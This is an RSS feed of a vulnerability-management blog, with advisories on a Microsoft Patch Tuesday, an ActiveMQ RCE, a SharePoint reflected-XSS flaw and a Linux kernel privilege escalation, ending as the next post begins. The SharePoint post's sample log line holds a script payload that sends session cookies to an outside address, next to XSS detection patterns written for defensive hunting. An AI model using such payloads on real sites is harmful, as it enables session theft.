<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Alexander V. Leonov</title>
	<atom:link href="https://avleonov.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://avleonov.com</link>
	<description>Vulnerability Management and more</description>
	<lastBuildDate>Sun, 24 May 2026 11:48:38 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>

<image>
	<url>https://avleonov.com/wp-content/uploads/2017/11/cropped-avl-32x32.png</url>
	<title>Alexander V. Leonov</title>
	<link>https://avleonov.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>May Microsoft Patch Tuesday</title>
		<link>https://avleonov.com/2026/05/19/i055-may-microsoft-patch-tuesday/</link>
					<comments>https://avleonov.com/2026/05/19/i055-may-microsoft-patch-tuesday/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Tue, 19 May 2026 08:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[Vulristics]]></category>
		<category><![CDATA[ActiveDirectory]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[DomainController]]></category>
		<category><![CDATA[Dynamics365]]></category>
		<category><![CDATA[GDI]]></category>
		<category><![CDATA[HeapSpray]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[MicrosoftOffice]]></category>
		<category><![CDATA[MicrosoftWord]]></category>
		<category><![CDATA[MSPT]]></category>
		<category><![CDATA[Netlogon]]></category>
		<category><![CDATA[PatchTuesday]]></category>
		<category><![CDATA[TCPIP]]></category>
		<category><![CDATA[UAF]]></category>
		<category><![CDATA[UseAfterFree]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WindowsKernel]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/05/19/i055-may-microsoft-patch-tuesday/</guid>

					<description><![CDATA[May Microsoft Patch Tuesday. A total of 119 vulnerabilities, approximately 1.5 times fewer than in April. There are currently no vulnerabilities marked as actively exploited in the wild. However, there is one vulnerability with a public exploit: 🔸 EoP - Windows Kernel (CVE-2026-40369). A detailed write-up and exploit for this vulnerability were published on May [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/05/photo_i055@01.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/05/photo_i055@01.jpg" alt="May Microsoft Patch Tuesday" width="425" height="425"/></a></center></p>
<p>
<b>May Microsoft Patch Tuesday.</b> A total of 119 vulnerabilities, approximately 1.5 times fewer than <a href="https://avleonov.com/2026/04/17/i028-april-microsoft-patch-tuesday/">in April</a>. There are currently no vulnerabilities marked as actively exploited in the wild. However, there is one vulnerability with a public exploit:</p>
<p>🔸 <b>EoP</b> - Windows Kernel (CVE-2026-40369). A detailed write-up and exploit for this vulnerability <a href="https://pwn2nimron.com/blog">were published</a> on May 14, two days after the May MSPT. The researcher describes exploitation of the vulnerability as follows: <i>"A single syscall from any unprivileged process — including inside Chrome's renderer sandbox — can increment arbitrary kernel memory addresses. No race conditions. No heap spray. No special tokens. 100% deterministic privilege escalation to SYSTEM."</i></p>
<p>Among the remaining ones, the following stand out:</p>
<p>🔹 <b>RCE</b> - Windows DNS Client (CVE-2026-41096). A ZDI analyst commented on this vulnerability as follows: <i>"This patch fixes a heap-based buffer overflow in the DNS Client triggered by a malicious DNS response. No authentication or user interaction needed, and since the DNS Client runs on virtually every Windows machine, the attack surface is enormous. An attacker with a position to influence DNS responses (MitM, rogue server) could achieve unauthenticated RCE across your enterprise."</i></p>
<p>🔹 <b>RCE</b> - Windows Netlogon (CVE-2026-41089). The vulnerability allows an unauthenticated remote attacker to execute arbitrary code on a domain controller by sending a specially crafted network request. Exploitation does not require credentials or user interaction, which classifies this vulnerability as wormable. Compromise of a domain controller means full compromise of the organization's entire domain. A Rapid7 analyst added in their commentary: <i>"No privileges or user interaction are required, and attack complexity is low, which suggests that creation of a reliable exploit might not be especially difficult for anyone with knowledge of the specific mechanism. Microsoft assesses exploitation as less likely, but since those exploitability assessments are provided without an accompanying explanation, it's not clear how much reassurance defenders should take. Anyone who remembers the much-discussed CVE-2020-1472 (aka ZeroLogon) back in 2020 will note that CVE-2026-41089 offers an attacker more immediate control of a domain controller. Patches are available for all versions of Windows Server from 2012 onwards."</i></p>
<p>🔹 <b>RCE</b> - Windows TCP/IP (CVE-2026-40415). Commentary from a ZDI analyst: <i>"This bug in the TCP/IP stack results from a use-after-free (UAF) and could allow a remote, unauthenticated threat actor to execute code without user interaction. That makes this another wormable bug. However, this one is much less likely to be exploited. The target needs to be under sustained low-memory (memory pressure) conditions, which is pretty rare."</i></p>
<p>🔹 <b>RCE</b> - Microsoft Word (CVE-2026-40361, CVE-2026-40364, CVE-2026-40366, CVE-2026-40367). An attacker can exploit these vulnerabilities through social engineering by sending a malicious file to a targeted victim. Successful exploitation would grant the attacker arbitrary code execution. Microsoft researchers note that the Preview Pane <b>is</b> an attack vector for each of these vulnerabilities.</p>
<p>🔹 <b>RCE</b> - Microsoft Office (CVE-2026-40363, CVE-2026-42831). A heap-based buffer overflow vulnerability in Microsoft Office may allow an unauthorized attacker to remotely execute arbitrary code.</p>
<p>🔹 <b>RCE</b> - Windows GDI (CVE-2026-35421). A heap-based buffer overflow vulnerability in the Windows GDI component may allow an unauthorized attacker to remotely execute arbitrary code.</p>
<p>🔹 <b>RCE</b> - Microsoft Dynamics 365 On-Premises (CVE-2026-42898). Commentary from a ZDI analyst: <i>"It allows any authenticated user to execute code with a scope change, meaning exploitation can break out and affect resources beyond the vulnerable component itself. Scope changes are pretty rare, so if you're running Dynamics 365 On-Prem, definitely test and deploy this patch quickly."</i></p>
<p>🔹 <b>EoP</b> - Windows Kernel (CVE-2026-33841, CVE-2026-35420, CVE-2026-40369). CVE-2026-33841 and CVE-2026-40369 are rated "Exploitation More Likely". A local attacker can use these vulnerabilities to elevate privileges: for CVE-2026-35420 and CVE-2026-40369 the target is SYSTEM, while for CVE-2026-33841 the gain is described as elevation to Medium/High integrity level.</p>
<p>🗒 <a href="https://avleonov.com/vulristics_reports/ms_patch_tuesday_may2026_report_with_comments_ext_img.html">Full Vulristics report</a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/05/19/i055-may-microsoft-patch-tuesday/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>About Remote Code Execution - Apache ActiveMQ (CVE-2026-34197) vulnerability</title>
		<link>https://avleonov.com/2026/05/14/i054-about-remote-code-execution-apache-activemq-cve202634197-vulnerability/</link>
					<comments>https://avleonov.com/2026/05/14/i054-about-remote-code-execution-apache-activemq-cve202634197-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Thu, 14 May 2026 10:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[ActiveMQ]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[CISAKEV]]></category>
		<category><![CDATA[FortiGuard]]></category>
		<category><![CDATA[HORIZON3]]></category>
		<category><![CDATA[JMX]]></category>
		<category><![CDATA[Jolokia]]></category>
		<category><![CDATA[Shadowserver]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/05/14/i054-about-remote-code-execution-apache-activemq-cve202634197-vulnerability/</guid>

					<description><![CDATA[About Remote Code Execution - Apache ActiveMQ (CVE-2026-34197) vulnerability. Apache ActiveMQ is a popular open-source message broker written in Java. Its main purpose is to send messages between different services, systems, and microservices without a direct connection between them. This vulnerability is from the April Linux Patch Wednesday. Details about this vulnerability were published on [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/05/photo_i054@00.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/05/photo_i054@00.jpg" alt="About Remote Code Execution - Apache ActiveMQ (CVE-2026-34197) vulnerability" width="425" height="425"/></a></center></p>
<p>
<b>About Remote Code Execution - Apache ActiveMQ (CVE-2026-34197) vulnerability</b>. <a href="https://activemq.apache.org/">Apache ActiveMQ</a> is a popular open-source message broker written in Java. Its main purpose is to <a href="https://artemis.apache.org/components/artemis/documentation/previous/2.37.0/messaging-concepts.html">send messages</a> between different services, systems, and microservices without a direct connection between them.</p>
<p>This vulnerability is from the <a href="https://avleonov.com/2026/04/22/i036-april-linux-patch-wednesday/">April Linux Patch Wednesday</a>. Details about this vulnerability were published on April 7 in <a href="https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/">the HORIZON3.ai company blog</a>. They claim that the Apache ActiveMQ Classic vulnerability has been hiding in plain sight for 13 years. An attacker can invoke a management operation through ActiveMQ's Jolokia API to trick the broker into fetching a remote configuration file and running arbitrary OS commands. As a result, the attacker can gain access to sensitive information, including messages, credentials, and configuration files, deploy malware, or use the compromised server to conduct further attacks within the internal infrastructure.</p>
<p>The vulnerability requires credentials, but default credentials (admin:admin) are common in many environments. On some versions (6.0.0–6.1.1), no credentials are required at all due to another vulnerability, CVE-2024-32114, which inadvertently exposes the Jolokia API without authentication. In those versions, CVE-2026-34197 is effectively an unauthenticated RCE.</p>
<p>🛠 Public exploits have been available on GitHub since April 8.</p>
<p>👾 Indicators of exploitation in the wild were <a href="https://www.fortiguard.com/encyclopedia/ips/60672">observed</a> by FortiGuard experts on April 13. The vulnerability <a href="https://www.cisa.gov/news-events/alerts/2026/04/16/cisa-adds-one-known-exploited-vulnerability-catalog">was added to the CISA KEV catalog</a> on April 16.</p>
<p>🌐 According to <a href="https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=other_range&d1=2026-04-14&d2=2026-05-14&source=activemq&tag=cve-2026-34197%2B&dataset=unique_ips&stacking=stacked">data from The Shadowserver Foundation</a>, as of May 14, approximately 7,000 vulnerable Apache ActiveMQ servers remain exposed on the internet.</p>
<p>⚙️ According to the vendor bulletin, the vulnerability <a href="https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt">has been fixed</a> in ActiveMQ versions 5.19.4 and 6.2.3. However, <a href="https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/">according to HORIZON3.ai</a>, it was fixed in 5.19.6 and 6.2.5. Given the discrepancy, treat the higher numbers as the minimum safe versions and install the newest release of the branch in use. 😉</p>
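<p>The triage logic described above, as an added example (not HORIZON3.ai's or the ActiveMQ project's code): given an ActiveMQ Classic version string, decide whether the host is exposed to CVE-2026-34197, whether exploitation needs credentials (the 6.0.0–6.1.1 range where CVE-2024-32114 exposes Jolokia unauthenticated), and which hosts to patch first. The fixed versions are the two sets cited above, and the example deliberately takes the higher of the two as the first safe release; the inventory lines are constructed, not real hosts.</p>

```python
"""Triage Apache ActiveMQ Classic versions against CVE-2026-34197.

Added example, not vendor or HORIZON3.ai code. The two cited sources disagree
on the fixed releases (vendor: 5.19.4 / 6.2.3, HORIZON3.ai: 5.19.6 / 6.2.5);
the conservative choice below treats the higher number as the first safe one.
"""
import re

# Conservative "first safe" release per major branch (higher of the two cited).
FIXED_MIN = {5: (5, 19, 6), 6: (6, 2, 5)}
# Releases where Jolokia is reachable without authentication (CVE-2024-32114).
UNAUTH_RANGE = ((6, 0, 0), (6, 1, 1))


def parse_version(text):
    """Return (major, minor, patch) from strings like '5.18.3' or '6.1.1-SNAPSHOT'."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(x) for x in m.groups())


def triage(version_text):
    """Classify one version: vulnerable or not, and whether an attacker needs credentials."""
    v = parse_version(version_text)
    fixed = FIXED_MIN.get(v[0])
    if fixed is None:
        # Branches other than 5.x / 6.x are outside the cited advisories: unknown.
        return {"version": v, "vulnerable": None, "needs_credentials": None,
                "note": "branch not covered by the cited advisories"}
    vulnerable = v < fixed
    unauth = UNAUTH_RANGE[0] <= v <= UNAUTH_RANGE[1]
    return {
        "version": v,
        "vulnerable": vulnerable,
        # Jolokia normally sits behind the web-console login; in the
        # CVE-2024-32114 range the Jolokia API is exposed with no login at all.
        "needs_credentials": (not unauth) if vulnerable else None,
        "fixed_in": ".".join(map(str, fixed)),
    }


# Constructed sample inventory (hypothetical hosts) in "host,version" form.
SAMPLE_INVENTORY = """\
mq-prod-01,6.1.1
mq-prod-02,6.2.3
mq-legacy,5.18.3
mq-new,6.2.5
"""


def prioritise(inventory_text):
    """Vulnerable hosts only, unauthenticated-RCE cases first, fixed hosts dropped."""
    rows = []
    for line in inventory_text.splitlines():
        host, _, ver = line.partition(",")
        if not ver:
            continue
        t = triage(ver)
        if t["vulnerable"]:
            rank = 0 if t["needs_credentials"] is False else 1
            rows.append((rank, host, ver))
    rows.sort()
    return [(host, ver) for _, host, ver in rows]
```

<p>Note that 6.2.3 and 6.2.4 come out as vulnerable here on purpose: the vendor text calls them fixed, HORIZON3.ai does not, and a patch queue should not rely on the optimistic reading.</p>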
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/05/14/i054-about-remote-code-execution-apache-activemq-cve202634197-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>About Spoofing - Microsoft SharePoint Server (CVE-2026-32201) vulnerability</title>
		<link>https://avleonov.com/2026/05/13/i053-pro-ujazvimost-spoofing-microsoft-sharepoint-server-cve202632201/</link>
					<comments>https://avleonov.com/2026/05/13/i053-pro-ujazvimost-spoofing-microsoft-sharepoint-server-cve202632201/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Wed, 13 May 2026 11:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[CISAKEV]]></category>
		<category><![CDATA[KEV]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[ReflectedXSS]]></category>
		<category><![CDATA[SharePoint]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[ZDI]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/05/13/i053-pro-ujazvimost-spoofing-microsoft-sharepoint-server-cve202632201/</guid>

					<description><![CDATA[About Spoofing - Microsoft SharePoint Server (CVE-2026-32201) vulnerability. A vulnerability from the April Microsoft Patch Tuesday. The description provided by Microsoft experts is extremely vague: "Improper input validation in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network. An attacker who successfully exploited the vulnerability could view some sensitive information (Confidentiality), [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/05/photo_i053@00.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/05/photo_i053@00.jpg" alt="About Spoofing - Microsoft SharePoint Server (CVE-2026-32201) vulnerability" width="425" height="425"/></a></center></p>
<p>
<b>About Spoofing - Microsoft SharePoint Server (CVE-2026-32201) vulnerability</b>. A vulnerability from the <a href="https://avleonov.com/2026/04/17/i028-april-microsoft-patch-tuesday/">April Microsoft Patch Tuesday</a>. The <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201">description</a> provided by Microsoft experts is extremely vague: <i>"Improper input validation in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network. An attacker who successfully exploited the vulnerability could view some sensitive information (Confidentiality), make changes to disclosed information (Integrity), but cannot limit access to the resource (Availability)."</i> Spoofing is an attack in which a threat actor forges data, an address, an identifier, or a trusted source in order to impersonate a legitimate user, service, or system.</p>
<p>What is actually hidden behind this description? In the April review on MSPT, a ZDI expert noted that vulnerabilities of this kind in SharePoint are often associated with XSS attacks.</p>
<p>🛠 On April 23, an exploit was published on GitHub, whose author claims that the vulnerability can be summarized as follows: <i>"An unauthenticated attacker can send a specially crafted HTTP request to inject malicious JavaScript (reflected XSS), which executes in the security context of the SharePoint site."</i></p>
<p>In other words, the attacker crafts a link to the SharePoint server that carries a JavaScript payload in a request parameter and gets a user to open it (for example, via e-mail or chat). SharePoint reflects that parameter into the response page without proper output encoding, so the browser runs the injected script in the origin of the SharePoint site. From there it can read data from the current session, steal authentication tokens, and perform actions on behalf of the user through the user's active session. Unlike stored XSS, nothing is written to the server: each victim has to open an attacker-supplied link, which is why the reconnaissance and phishing stages matter.</p>
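<p>The reflection mechanism described above, as an added generic example (not the CVE-2026-32201 payload, endpoint or parameter, none of which this post reproduces): a handler that pastes a query parameter into HTML, the same handler with output encoding, and a heuristic over constructed IIS-style log lines that flags requests carrying a script payload in the query string. The page path, parameter name and log lines are all constructed for illustration.</p>

```python
"""Reflected XSS: vulnerable vs. encoded rendering, plus a log heuristic.

Added example, not SharePoint code and not the CVE-2026-32201 exploit. The
'/_layouts/15/page.aspx' path and the 'q' parameter are constructed stand-ins.
"""
import html
import re
import urllib.parse


def render_unsafe(query):
    """Vulnerable: the 'q' parameter is placed into the HTML response verbatim."""
    q = urllib.parse.parse_qs(query).get("q", [""])[0]
    return f"<h2>Results for: {q}</h2>"


def render_safe(query):
    """Hardened: HTML-encode before inserting into markup, so '<' becomes '&lt;'."""
    q = urllib.parse.parse_qs(query).get("q", [""])[0]
    return f"<h2>Results for: {html.escape(q, quote=True)}</h2>"


# Markers that, after URL-decoding, indicate an injected tag or handler rather than a search term.
_XSS_MARKERS = re.compile(r"<\s*script|javascript:|on\w+\s*=|<\s*img|<\s*svg", re.I)


def is_suspicious_query(cs_uri_query):
    """True if the decoded query carries an HTML/JS payload; decoded twice to catch double-encoding."""
    decoded = urllib.parse.unquote_plus(urllib.parse.unquote_plus(cs_uri_query))
    return bool(_XSS_MARKERS.search(decoded))


# Constructed IIS W3C-style lines: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
SAMPLE_LOG = """\
2026-04-10 09:12:01 10.0.0.5 GET /_layouts/15/page.aspx q=quarterly+report 203.0.113.10 200
2026-04-10 09:12:07 10.0.0.5 GET /_layouts/15/page.aspx q=%3Cscript%3Efetch('//203.0.113.10/'%2Bdocument.cookie)%3C/script%3E 203.0.113.10 200
2026-04-10 09:13:44 10.0.0.5 GET /_layouts/15/page.aspx q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E 198.51.100.7 200
"""


def flag_log(text):
    """Return (client_ip, query) for each request whose query looks like reflected-XSS bait."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 8:
            continue
        query, client = parts[5], parts[6]
        if is_suspicious_query(query):
            hits.append((client, query))
    return hits
```

<p>The decisive difference between the two renderers is a single <code>html.escape</code> call at the point where untrusted input meets markup; the log heuristic is a triage aid for hunting exploitation attempts, not a substitute for the patch, since a 200 response tells you the payload was reflected, not whether a victim ever opened the link.</p>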
<p>👾 Microsoft experts noted the vulnerability as being exploited in the wild on the day of publication of the April Microsoft Patch Tuesday, April 14. The vulnerability was <a href="https://www.cisa.gov/news-events/alerts/2026/04/14/cisa-adds-two-known-exploited-vulnerabilities-catalog">added</a> to the CISA KEV. On the same day, researchers from Defused <a href="https://www.cybersecuritydive.com/news/medium-severity-flaw-microsoft-sharepoint-exploitation/817559/">reported</a> coordinated reconnaissance activity targeting vulnerable SharePoint servers, which was carried out from four IP addresses between April 1 and April 11.</p>
<p>⚙️ Updates are available for Microsoft SharePoint Server 2016, 2019, and Subscription Edition.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/05/13/i053-pro-ujazvimost-spoofing-microsoft-sharepoint-server-cve202632201/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>About Elevation of Privilege - Linux Kernel &quot;Dirty Frag&quot; (CVE-2026-43284, CVE-2026-43500) vulnerability</title>
		<link>https://avleonov.com/2026/05/08/i051-about-elevation-of-privilege-vulnerability-linux-kernel-dirty-frag-cve202643284-cve202643500-vulnerability/</link>
					<comments>https://avleonov.com/2026/05/08/i051-about-elevation-of-privilege-vulnerability-linux-kernel-dirty-frag-cve202643284-cve202643500-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Fri, 08 May 2026 11:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[AlmaLinux]]></category>
		<category><![CDATA[AppArmor]]></category>
		<category><![CDATA[CentOSStream]]></category>
		<category><![CDATA[DirtyFrag]]></category>
		<category><![CDATA[Fedora]]></category>
		<category><![CDATA[HyunwooKim]]></category>
		<category><![CDATA[KernelExploit]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[LinuxKernel]]></category>
		<category><![CDATA[openSUSE]]></category>
		<category><![CDATA[RHEL]]></category>
		<category><![CDATA[RxRPC]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[v4bel]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xfrmESP]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/05/08/i051-about-elevation-of-privilege-linux-kernel-copy-fail-cve202631431-vulnerability/</guid>

					<description><![CDATA[About Elevation of Privilege - Linux Kernel "Dirty Frag" (CVE-2026-43284, CVE-2026-43500) vulnerability. According to information from researcher Hyunwoo Kim (@v4bel), Dirty Frag is a vulnerability (a class of vulnerabilities) that allows a local unprivileged attacker to obtain root privileges on most Linux distributions by combining the xfrm-ESP Page-Cache Write vulnerability (CVE-2026-43284) and the RxRPC [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/05/photo_i051@00.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/05/photo_i051@00.jpg" alt="About Elevation of Privilege - Linux Kernel Dirty Frag (CVE-2026-43284, CVE-2026-43500) vulnerability" width="425" height="425"/></a></center></p>
<p>
<b>About Elevation of Privilege - Linux Kernel "Dirty Frag" (CVE-2026-43284, CVE-2026-43500) vulnerability.</b> According to information from researcher <a href="https://github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md#:~:text=Dirty%20Frag%20is%20a%20vulnerability%20(class)">Hyunwoo Kim (@v4bel)</a>, Dirty Frag is a vulnerability (a class of vulnerabilities) that allows a local unprivileged attacker to obtain root privileges on most Linux distributions by combining the xfrm-ESP Page-Cache Write vulnerability (CVE-2026-43284) and the RxRPC Page-Cache Write vulnerability (CVE-2026-43500). Exploitation of this chain enables the attacker to fully compromise the system: gain access to any files, disable protections, establish persistence, and use the host for further attacks.</p>
<p>⚙️🛠 <a href="https://github.com/V4bel/dirtyfrag">The vulnerability chain description</a>, <a href="https://github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md">technical write-up and exploit code</a> were published on May 7. Exploitability has been confirmed on up-to-date distributions including Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, and Fedora 44. The xfrm-ESP Page-Cache Write vulnerability <a href="https://github.com/V4bel/dirtyfrag/tree/master#:~:text=Cache%20Write%20vulnerability-,is%20in%20scope,-from%20cac2661c53f3%20(2017">has been present in the kernel</a> since commit cac2661c53f3 (2017-01-17) and up to the current upstream version, while the RxRPC Page-Cache Write vulnerability has been present in the kernel since commit 2dc334f1a63a (2023-06) and up to the current upstream version. In other words, the actual time span during which these vulnerabilities have existed in the kernel is around 9 years.</p>
<p>Information about the vulnerability and the exploit was published before patches were available in affected Linux distributions. According to the researcher, on May 7 he submitted detailed information about the vulnerability and the exploit to the linux-distros mailing list. The embargo was set for 5 days, with an agreement that if a third party published the exploit on the internet during the embargo period, the "Dirty Frag" exploit would be released publicly. On the same day, this is exactly what happened: the information was leaked to the public, and the embargo was violated. 🤷‍♂️ As a result, the researcher proceeded with full disclosure.</p>
<p>A similar high-profile vulnerability, Elevation of Privilege - Linux Kernel "Copy Fail" (<a href="https://avleonov.com/2026/04/30/i044-about-elevation-of-privilege-linux-kernel-copy-fail-cve202631431-vulnerability/">CVE-2026-31431</a>), served as the motivation for this research. As <a href="https://github.com/V4bel/dirtyfrag#:~:text=What%20is%20its%20relationship%20with%20the%20%22Copy%20Fail%22%20vulnerability">the researcher reports</a>, the xfrm-ESP Page-Cache Write vulnerability in the Dirty Frag chain shares the same sink as Copy Fail. However, it is triggered regardless of whether the algif_aead module is available. In other words, even on systems where the publicly known Copy Fail mitigation (algif_aead blacklist) is applied, Linux remains vulnerable to Dirty Frag.</p>
<p>Why is a chain of two vulnerabilities used? As <a href="https://github.com/V4bel/dirtyfrag#:~:text=Why%20did%20you%20chain%20two%20vulnerabilities">the researcher reports</a>, the xfrm-ESP Page-Cache Write vulnerability provides a powerful arbitrary 4-byte STORE primitive, similar to Copy Fail, and is present in most distributions. However, its exploitation requires the privilege to create a namespace. In Ubuntu, unprivileged user namespace creation is sometimes restricted by AppArmor policy. In such an environment, xfrm-ESP Page-Cache Write cannot be triggered. The RxRPC Page-Cache Write vulnerability does not require the privilege to create a namespace, but the rxrpc.ko module itself is not included in most distributions. However, on Ubuntu, the rxrpc.ko module is loaded by default. Chaining the two variants makes the blind spots cover each other, allowing root privileges to be obtained on every major distribution. </p>
<p>As of May 8, the fix for the xfrm-ESP Page-Cache Write (CVE-2026-43284) vulnerability has been <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4">merged</a> into the mainline Linux kernel, while the fix for the RxRPC Page-Cache Write (CVE-2026-43500) vulnerability has not yet been merged. It is recommended to monitor the release of security updates for CVE-2026-43284 and CVE-2026-43500 across the Linux distributions in use and apply them promptly. As a workaround, the vulnerability researcher proposes a script (run as root) that prevents the esp4, esp6, and rxrpc modules from loading, attempts to unload them from the kernel, and drops the clean page cache, which evicts any page-cache pages that may already have been poisoned:</p>
<p>sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"</p>
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/05/08/i051-about-elevation-of-privilege-vulnerability-linux-kernel-dirty-frag-cve202643284-cve202643500-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>About Elevation of Privilege - Linux Kernel &quot;Copy Fail&quot; (CVE-2026-31431) vulnerability</title>
		<link>https://avleonov.com/2026/04/30/i044-about-elevation-of-privilege-linux-kernel-copy-fail-cve202631431-vulnerability/</link>
					<comments>https://avleonov.com/2026/04/30/i044-about-elevation-of-privilege-linux-kernel-copy-fail-cve202631431-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Thu, 30 Apr 2026 18:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[AFALG]]></category>
		<category><![CDATA[AmazonLinux]]></category>
		<category><![CDATA[ArchLinux]]></category>
		<category><![CDATA[CISA]]></category>
		<category><![CDATA[CISAKEV]]></category>
		<category><![CDATA[CloudLinux]]></category>
		<category><![CDATA[ContainerEscape]]></category>
		<category><![CDATA[CopyFail]]></category>
		<category><![CDATA[Debian]]></category>
		<category><![CDATA[DirtyCow]]></category>
		<category><![CDATA[DirtyPipe]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Fedora]]></category>
		<category><![CDATA[KernelExploit]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[LinuxKernel]]></category>
		<category><![CDATA[PoC]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[RaceCondition]]></category>
		<category><![CDATA[RHEL]]></category>
		<category><![CDATA[ROSA]]></category>
		<category><![CDATA[ROSALinux]]></category>
		<category><![CDATA[SUSE]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[VFS]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/04/30/i044-pro-ujazvimost-elevation-of-privilege-linux-kernel-copy-fail-cve202631431/</guid>

					<description><![CDATA[About Elevation of Privilege - Linux Kernel "Copy Fail" (CVE-2026-31431) vulnerability. A local privilege escalation vulnerability in the Linux kernel AF_ALG component, which is caused by a memory handling flaw, allows an unprivileged user to escalate privileges to root. By exploiting this vulnerability, an attacker can fully compromise the system: read and modify any files, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/05/photo_i044@01.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/05/photo_i044@01.jpg" alt="About Elevation of Privilege - Linux Kernel Copy Fail (CVE-2026-31431) vulnerability" width="425" height="425"/></a></center></p>
<p>
